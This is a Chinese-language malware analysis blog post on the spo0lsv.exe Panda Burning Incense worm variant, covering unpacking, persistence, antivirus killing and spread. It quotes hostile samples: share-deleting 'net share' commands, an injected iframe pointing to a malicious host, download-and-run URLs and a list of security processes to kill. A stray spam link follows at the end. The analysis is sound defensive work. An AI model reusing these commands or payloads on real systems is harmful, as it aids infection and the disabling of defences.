[TOC]
0x0 样本信息&分析平台
1 样本信息
病毒名:spo0lsv.exe
大小: 30001 bytes
壳信息:FSG v2.0
MD5: 512301C535C88255C9A252FDF70B7A03
SHA1: CA3A1070CFF311C0BA40AB60A8FE3266CFEFE870
CRC32: E334747C
2 分析平台&使用工具
- win7 x86
- od
- IDA
0x1 主要病毒行为
- 更改可执行文件图标,内容等信息
- 强制关闭杀毒、任务管理器等软件
- 设置开机自启病毒
- 设置用户点击磁盘启动病毒
- 更改html,php等网络文件
0x2 脱壳
脱壳
首先通过PEID可以发现这个区段是不对的,通过查壳工具发现这个壳是FSG 2.0,这个壳是非常好脱的
病毒在0x004001D1 这个位置进行了IAT修复
0x0041012C是IAT表的地址,通过观察内存分布可以看出,这个壳把本来IAT中全0结束改为0x7FFFFFFF结束,这样ImportRec在修复的时候就遍历不到其他的导入表了,因此修改成了全0结尾
ImportRec 无法识别netapi.dll, 需要手动修复,或者使用x32dbg 修复
0x3 病毒分析
1 把自身拷贝到系统文件
在所有盘创建一个ini文件夹
写入一些自启的字符串
字符串的作用是使得打开改盘就自动运行病毒文件
更改这个文件属性为:只读,隐藏,并且为操作系统专用
更改exe文件属性,
更改XX:\setup.exe 为只读,隐藏属性,并且为操作系统专用
获取系统目录
2 添加注册表,设置开机自启
设置病毒开机自启
并且通过设置注册表中SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue
的值,强制设置不显示隐藏文件
3 删除共享磁盘文件
cmd.exe /c net share A$ /del /y
cmd.exe /c net share admin$ /del /y
cmd.exe /c net share C$ /del /y
4 病毒守护,关闭杀软,任务管理器,注册表等进程
进程提权,debug权限
查找杀毒软件,任务管理器等程序,找到关闭
通过FindWindow的方式来查找程序,并监控以下程序
防火墙进程
VirusScan
NOD32
网镖
杀毒
毒霸
瑞星
江民
超级兔子
优化大师
木马清道夫
木馬清道夫
卡巴斯基反病毒
Symantec AntiVirus
Duba
esteem procs
绿鹰PC
密码防盗
噬菌体
木马辅助查找器
System Safety Monitor
Wrapped gift Killer.
WinsockExpert
游戏木马检测大师
超级巡警
msctls_statusbar32
pjf(ustc)
IceSword
Mcshield.exe
VsTskMgr.exe
naPrdMgr.exe
UpdaterUI.exe
TBMon.exe
scan32.exe
Ravmond.exe
CCenter.exe.
.RavTask.exe.
Rav.exe.
Ravmon.exe
RavmonD.exe
RavStub.exe.
KVXP.kxp
KvMonXP.kxp
KVCenter.kxp
KVSrvXP.exe.
KRegEx.exe
UIHost.exe
TrojDie.kxp.
.FrogAgent.exe
Logo1_.exe
Logo_1.exe
Rundl132.exe
egedit.exe
msconfig.exe
taskmgr.exe
一旦发现上面的程序打开,就发送WM_QUIT
消息,关闭窗口
5 删除服务和注册表
停掉的服务和删除的注册表如下
6 进行文件更改
遍历除了以下文件夹中的EXE,GHO,PIF,HTML等文件,进行修改
Recycled
Windows NT
WindowsUpdate
Windows Media Player
Outlook Express
InternetExplorer
NetMeeting
Common Files
ComPlus Applications
Messenger
InstallShield
Installation Information
MSN
Microsoft Frontpage
Movie Maker
MSN Gamin Zone
进行磁盘遍历,如果是文件的话,判断文件的后缀名,但是不感染流媒体,MSN等程序
- 如果后缀名是
.GHO
,删除文件
对于html,htm,asp,aspx
等文件,写入<iframe src=http://www.ac86.cn/66/index.htm width="0" height="0"></iframe>
对于EXE文件,直接拷贝病毒文件覆盖源文件
7 下载网络文件,进行局域网传播
www.tom.com
www.163.com
www.sohu.com
www.google.com
http://www.update.whboy.net/worm.txt
http://www.ac86cn/66/up.txt
网络请求抓包如下
下载网络文件,保存本地
并且执行这个下载的网络文件
通过通过打开枚举本地IP的445和139端口,尝试打开打开共享文件,进行局域网病毒传播
445端口
139端口
0x4 总结
这个病毒文件其实是并不是很难,尤其是可以看到,其对本身的进程保护和关闭杀毒软件,都是在3环下完成的,并没有用到驱动文件。
但是,其起开的大量线程造成了分析的极度不变,需要极其的耐心来分析。
The post 熊猫烧香变种 spo0lsv.exe 病毒分析 appeared first on cole.
http://ift.tt/2CihFdD Win, reverse engineering, virus, 病毒, 逆向 February 14, 2018 at 03:49AM
mampurMsumpgi_1995 Ryan Black https://wakelet.com/wake/1NN4U-hCOvru2xLFjjyfV
回复删除cuedigholo